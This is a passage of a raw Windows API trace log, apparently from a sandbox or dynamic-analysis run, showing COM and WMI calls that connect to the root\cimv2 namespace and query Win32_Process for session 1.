puBuffLength=0x19f210*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f210*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0263.654] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1a0 | out: ppv=0x19f1a0*=0x601a94) returned 0x0 [0263.654] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f198 | out: pAptType=0x19f198*=1) returned 0x0 [0263.654] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f19c | out: ppvObject=0x19f19c*=0x0) returned 0x80004002 [0263.654] IUnknown:Release (This=0x601a94) returned 0x1 [0263.657] CoGetClassObject (in: rclsid=0x6bdd2c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19edc0 | out: ppv=0x19edc0*=0x6416e0) returned 0x0 [0263.658] WbemLocator:IUnknown:QueryInterface (in: This=0x6416e0, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19efd8 | out: ppvObject=0x19efd8*=0x0) returned 0x80004002 [0263.658] WbemLocator:IClassFactory:CreateInstance (in: This=0x6416e0, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19efec | out: ppvObject=0x19efec*=0x54ba358) returned 0x0 [0263.658] WbemLocator:IUnknown:Release (This=0x6416e0) returned 0x0 [0263.658] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba358, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec0c | out: ppvObject=0x19ec0c*=0x54ba358) returned 0x0 [0263.658] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba358, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ebc8 | out: ppvObject=0x19ebc8*=0x0) returned 0x80004002 [0263.658] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba358, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e7bc | out: ppvObject=0x19e7bc*=0x0) returned 0x80004002 [0263.659] WbemLocator:IUnknown:AddRef (This=0x54ba358) returned 0x3 [0263.659] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba358, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e524 | out: ppvObject=0x19e524*=0x0) returned 0x80004002 [0263.659] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba358, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e4d4 | out: ppvObject=0x19e4d4*=0x0) returned 0x80004002 [0263.659] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba358, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e4e0 | out: ppvObject=0x19e4e0*=0x0) returned 0x80004002 [0263.659] CoGetContextToken (in: pToken=0x19e540 | out: pToken=0x19e540) returned 0x0 [0263.659] CoGetContextToken (in: pToken=0x19e948 | out: pToken=0x19e948) returned 0x0 [0263.659] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba358, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e9d8 | out: ppvObject=0x19e9d8*=0x0) returned 0x80004002 [0263.659] WbemLocator:IUnknown:Release (This=0x54ba358) returned 0x2 [0263.659] WbemLocator:IUnknown:Release (This=0x54ba358) returned 0x1 [0263.659] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0263.659] CoGetContextToken (in: pToken=0x19ef18 | out: pToken=0x19ef18) returned 0x0 [0263.659] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba358, riid=0x19efe8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19efe4 | out: ppvObject=0x19efe4*=0x54ba358) returned 0x0 [0263.659] WbemLocator:IUnknown:AddRef (This=0x54ba358) returned 0x3 [0263.659] WbemLocator:IUnknown:Release (This=0x54ba358) returned 0x2 [0263.659] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f17c | out: puCount=0x19f17c*=0x2) returned 0x0 [0263.659] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=8, puBuffLength=0x19f178*=0x0, pszText=0x0 | out: puBuffLength=0x19f178*=0xf, pszText=0x0) returned 0x0 [0263.659] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=8, puBuffLength=0x19f178*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f178*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0263.660] CoCreateInstance (in: rclsid=0x6d3c1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d3c12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x19f054 | out: ppv=0x19f054*=0x54ba248) returned 0x0 [0263.660] WbemLocator:IWbemLocator:ConnectServer (in: This=0x54ba248, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x19f0e8 | out: ppNamespace=0x19f0e8*=0x67f180) returned 0x0 [0263.741] WbemLocator:IUnknown:QueryInterface (in: This=0x67f180, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ef84 | out: ppvObject=0x19ef84*=0x67054c) returned 0x0 [0263.742] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x67054c, pProxy=0x67f180, pAuthnSvc=0x19efd4, pAuthzSvc=0x19efd0, pServerPrincName=0x19efc8, pAuthnLevel=0x19efcc, pImpLevel=0x19efbc, pAuthInfo=0x19efc0, pCapabilites=0x19efc4 | out: pAuthnSvc=0x19efd4*=0xa, pAuthzSvc=0x19efd0*=0x0, pServerPrincName=0x19efc8, pAuthnLevel=0x19efcc*=0x6, pImpLevel=0x19efbc*=0x2, pAuthInfo=0x19efc0, pCapabilites=0x19efc4*=0x1) returned 0x0 [0263.742] WbemLocator:IUnknown:Release (This=0x67054c) returned 0x1 [0263.742] WbemLocator:IUnknown:QueryInterface (in: This=0x67f180, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ef78 | out: ppvObject=0x19ef78*=0x670570) returned 0x0 [0263.742] WbemLocator:IUnknown:QueryInterface (in: This=0x67f180, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ef74 | out: ppvObject=0x19ef74*=0x67054c) returned 0x0 [0263.742] WbemLocator:IClientSecurity:SetBlanket (This=0x67054c, pProxy=0x67f180, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0263.742] WbemLocator:IUnknown:Release (This=0x67054c) returned 0x2 [0263.742] WbemLocator:IUnknown:Release (This=0x670570) returned 0x1 [0263.742] CoTaskMemFree (pv=0x54bc2c8) [0263.743] WbemLocator:IUnknown:Release (This=0x54ba248) returned 0x0 [0263.743] WbemLocator:IUnknown:QueryInterface (in: This=0x67f180, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eb74 | out: ppvObject=0x19eb74*=0x670570) returned 0x0 [0263.743] WbemLocator:IUnknown:QueryInterface (in: This=0x670570, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19eb30 | out: ppvObject=0x19eb30*=0x0) returned 0x80004002 [0263.744] WbemLocator:IUnknown:QueryInterface (in: This=0x670570, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e94c | out: ppvObject=0x19e94c*=0x0) returned 0x80004002 [0263.744] WbemLocator:IUnknown:QueryInterface (in: This=0x67f180, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e724 | out: ppvObject=0x19e724*=0x0) returned 0x80004002 [0263.745] WbemLocator:IUnknown:AddRef (This=0x670570) returned 0x3 [0263.745] WbemLocator:IUnknown:QueryInterface (in: This=0x670570, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e48c | out: ppvObject=0x19e48c*=0x0) returned 0x80004002 [0263.745] WbemLocator:IUnknown:QueryInterface (in: This=0x670570, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e43c | out: ppvObject=0x19e43c*=0x0) returned 0x80004002 [0263.745] WbemLocator:IUnknown:QueryInterface (in: This=0x670570, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e448 | out: ppvObject=0x19e448*=0x6704cc) returned 0x0 [0263.745] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x6704cc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e450 | out: pCid=0x19e450*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0263.745] WbemLocator:IUnknown:Release (This=0x6704cc) returned 0x3 [0263.745] CoGetContextToken (in: pToken=0x19e4a8 | out: pToken=0x19e4a8) returned 0x0 [0263.745] CoGetContextToken (in: pToken=0x19e8b0 | out: pToken=0x19e8b0) returned 0x0 [0263.745] WbemLocator:IUnknown:QueryInterface (in: This=0x670570, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e940 | out: ppvObject=0x19e940*=0x670554) returned 0x0 [0263.745] WbemLocator:IRpcOptions:Query (in: This=0x670554, pPrx=0x670570, dwProperty=2, pdwValue=0x19e968 | out: pdwValue=0x19e968) returned 0x80004002 [0263.745] WbemLocator:IUnknown:Release (This=0x670554) returned 0x3 [0263.745] WbemLocator:IUnknown:Release (This=0x670570) returned 0x2 [0263.745] CoGetContextToken (in: pToken=0x19ee88 | out: pToken=0x19ee88) returned 0x0 [0263.745] CoGetContextToken (in: pToken=0x19ede8 | out: pToken=0x19ede8) returned 0x0 [0263.746] WbemLocator:IUnknown:QueryInterface (in: This=0x670570, riid=0x19eeb8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x19eeb4 | out: ppvObject=0x19eeb4*=0x67f180) returned 0x0 [0263.746] WbemLocator:IUnknown:AddRef (This=0x67f180) returned 0x4 [0263.746] WbemLocator:IUnknown:Release (This=0x67f180) returned 0x3 [0263.746] WbemLocator:IUnknown:Release (This=0x67f180) returned 0x2 [0263.746] SysStringLen (param_1=0x0) returned 0x0 [0263.746] CoGetContextToken (in: pToken=0x19ee80 | out: pToken=0x19ee80) returned 0x0 [0263.746] WbemLocator:IUnknown:AddRef (This=0x670570) returned 0x3 [0263.746] WbemLocator:IUnknown:QueryInterface (in: This=0x670570, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed14 | out: ppvObject=0x19ed14*=0x670570) returned 0x0 [0263.746] WbemLocator:IUnknown:Release (This=0x670570) returned 0x3 [0263.746] WbemLocator:IUnknown:Release (This=0x670570) returned 0x2 [0263.746] CoGetContextToken (in: pToken=0x19ef50 | out: pToken=0x19ef50) returned 0x0 [0263.746] WbemLocator:IUnknown:AddRef (This=0x67f180) returned 0x3 [0263.747] IWbemServices:ExecQuery (in: This=0x67f180, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Process Where SessionId='1'", lFlags=16, pCtx=0x0, ppEnum=0x19f184 | out: ppEnum=0x19f184*=0x663780) returned 0x0 [0263.786] IUnknown:QueryInterface (in: This=0x663780, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19efc4 | out: ppvObject=0x19efc4*=0x663784) returned 0x0 [0263.786] IClientSecurity:QueryBlanket (in: This=0x663784, pProxy=0x663780, pAuthnSvc=0x19f014, pAuthzSvc=0x19f010, pServerPrincName=0x19f008, pAuthnLevel=0x19f00c, pImpLevel=0x19effc, pAuthInfo=0x19f000, pCapabilites=0x19f004 | out: pAuthnSvc=0x19f014*=0xa, pAuthzSvc=0x19f010*=0x0, pServerPrincName=0x19f008, pAuthnLevel=0x19f00c*=0x6, pImpLevel=0x19effc*=0x2, pAuthInfo=0x19f000, pCapabilites=0x19f004*=0x1) returned 0x0 [0263.786] IUnknown:Release (This=0x663784) returned 0x1 [0263.786] IUnknown:QueryInterface (in: This=0x663780, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19efb8 | out: ppvObject=0x19efb8*=0x66f970) returned 0x0 [0263.786] IUnknown:QueryInterface (in: This=0x663780, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19efb4 | out: ppvObject=0x19efb4*=0x663784) returned 0x0 [0263.786] IClientSecurity:SetBlanket (This=0x663784, pProxy=0x663780, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0263.788] IUnknown:Release (This=0x663784) returned 0x2 [0263.788] WbemLocator:IUnknown:Release (This=0x66f970) returned 0x1 [0263.788] CoTaskMemFree (pv=0x54bc4d8) [0263.788] IUnknown:QueryInterface (in: This=0x663780, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ebb0 | out: ppvObject=0x19ebb0*=0x66f970) returned 0x0 [0263.788] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19eb6c | out: ppvObject=0x19eb6c*=0x0) returned 0x80004002 [0263.789] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e98c | out: ppvObject=0x19e98c*=0x0) returned 0x80004002 [0263.789] IUnknown:QueryInterface (in: This=0x663780, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e764 | out: ppvObject=0x19e764*=0x0) returned 0x80004002 [0263.790] WbemLocator:IUnknown:AddRef (This=0x66f970) returned 0x3 [0263.790] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e4cc | out: ppvObject=0x19e4cc*=0x0) returned 0x80004002 [0263.790] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e47c | out: ppvObject=0x19e47c*=0x0) returned 0x80004002 [0263.790] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e488 | out: ppvObject=0x19e488*=0x66f8cc) returned 0x0 [0263.790] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66f8cc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e490 | out: pCid=0x19e490*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0263.790] WbemLocator:IUnknown:Release (This=0x66f8cc) returned 0x3 [0263.790] CoGetContextToken (in: pToken=0x19e4e8 | out: pToken=0x19e4e8) returned 0x0 [0263.790] CoGetContextToken (in: pToken=0x19e8f0 | out: pToken=0x19e8f0) returned 0x0 [0263.791] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e980 | out: ppvObject=0x19e980*=0x66f954) returned 0x0 [0263.791] WbemLocator:IRpcOptions:Query (in: This=0x66f954, pPrx=0x66f970, dwProperty=2, pdwValue=0x19e9a8 | out: pdwValue=0x19e9a8) returned 0x80004002 [0263.791] WbemLocator:IUnknown:Release (This=0x66f954) returned 0x3 [0263.791] WbemLocator:IUnknown:Release (This=0x66f970) returned 0x2 [0263.791] CoGetContextToken (in: pToken=0x19eec0 | out: pToken=0x19eec0) returned 0x0 [0263.791] CoGetContextToken (in: pToken=0x19ee20 | out: pToken=0x19ee20) returned 0x0 [0263.791] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x19eef0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19eeec | out: ppvObject=0x19eeec*=0x663780) returned 0x0 [0263.791] IUnknown:AddRef (This=0x663780) returned 0x4 [0263.791] IUnknown:Release (This=0x663780) returned 0x3 [0263.791] IUnknown:Release (This=0x663780) returned 0x2 [0263.791] WbemLocator:IUnknown:Release (This=0x67f180) returned 0x2 [0263.791] SysStringLen (param_1=0x0) returned 0x0 [0263.791] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d0 | out: puCount=0x19f1d0*=0x2) returned 0x0 [0263.791] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1cc*=0x0, pszText=0x0 | out: puBuffLength=0x19f1cc*=0xf, pszText=0x0) returned 0x0 [0263.791] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1cc*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1cc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0263.791] CoGetContextToken (in: pToken=0x19f020 | out: pToken=0x19f020) returned 0x0 [0263.791] IUnknown:AddRef (This=0x663780) returned 0x3 [0263.792] IEnumWbemClassObject:Clone (in: This=0x663780, ppEnum=0x19f1dc | out: ppEnum=0x19f1dc*=0x663848) returned 0x0 [0263.793] IUnknown:QueryInterface (in: This=0x663848, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f0a0 | out: ppvObject=0x19f0a0*=0x66384c) returned 0x0 [0263.793] IClientSecurity:QueryBlanket (in: This=0x66384c, pProxy=0x663848, pAuthnSvc=0x19f0f0, pAuthzSvc=0x19f0ec, pServerPrincName=0x19f0e4, pAuthnLevel=0x19f0e8, pImpLevel=0x19f0d8, pAuthInfo=0x19f0dc, pCapabilites=0x19f0e0 | out: pAuthnSvc=0x19f0f0*=0xa, pAuthzSvc=0x19f0ec*=0x0, pServerPrincName=0x19f0e4, pAuthnLevel=0x19f0e8*=0x6, pImpLevel=0x19f0d8*=0x2, pAuthInfo=0x19f0dc, pCapabilites=0x19f0e0*=0x1) returned 0x0 [0263.793] IUnknown:Release (This=0x66384c) returned 0x1 [0263.793] IUnknown:QueryInterface (in: This=0x663848, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f094 | out: ppvObject=0x19f094*=0x66f270) returned 0x0 [0263.793] IUnknown:QueryInterface (in: This=0x663848, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f090 | out: ppvObject=0x19f090*=0x66384c) returned 0x0 [0263.794] IClientSecurity:SetBlanket (This=0x66384c, pProxy=0x663848, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0263.842] IUnknown:Release (This=0x66384c) returned 0x2 [0263.842] WbemLocator:IUnknown:Release (This=0x66f270) returned 0x1 [0263.843] CoTaskMemFree (pv=0x54bc268) [0263.843] IUnknown:QueryInterface (in: This=0x663848, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec7c | out: ppvObject=0x19ec7c*=0x66f270) returned 0x0 [0263.843] WbemLocator:IUnknown:QueryInterface (in: This=0x66f270, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ec38 | out: ppvObject=0x19ec38*=0x0) returned 0x80004002 [0263.844] WbemLocator:IUnknown:QueryInterface (in: This=0x66f270, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ea54 | out: ppvObject=0x19ea54*=0x0) returned 0x80004002 [0263.844] IUnknown:QueryInterface (in: This=0x663848, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e82c | out: ppvObject=0x19e82c*=0x0) returned 0x80004002 [0263.844] WbemLocator:IUnknown:AddRef (This=0x66f270) returned 0x3 [0263.845] WbemLocator:IUnknown:QueryInterface (in: This=0x66f270, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e594 | out: ppvObject=0x19e594*=0x0) returned 0x80004002 [0263.845] WbemLocator:IUnknown:QueryInterface (in: This=0x66f270, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0263.845] WbemLocator:IUnknown:QueryInterface (in: This=0x66f270, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e550 | out: ppvObject=0x19e550*=0x66f1cc) returned 0x0 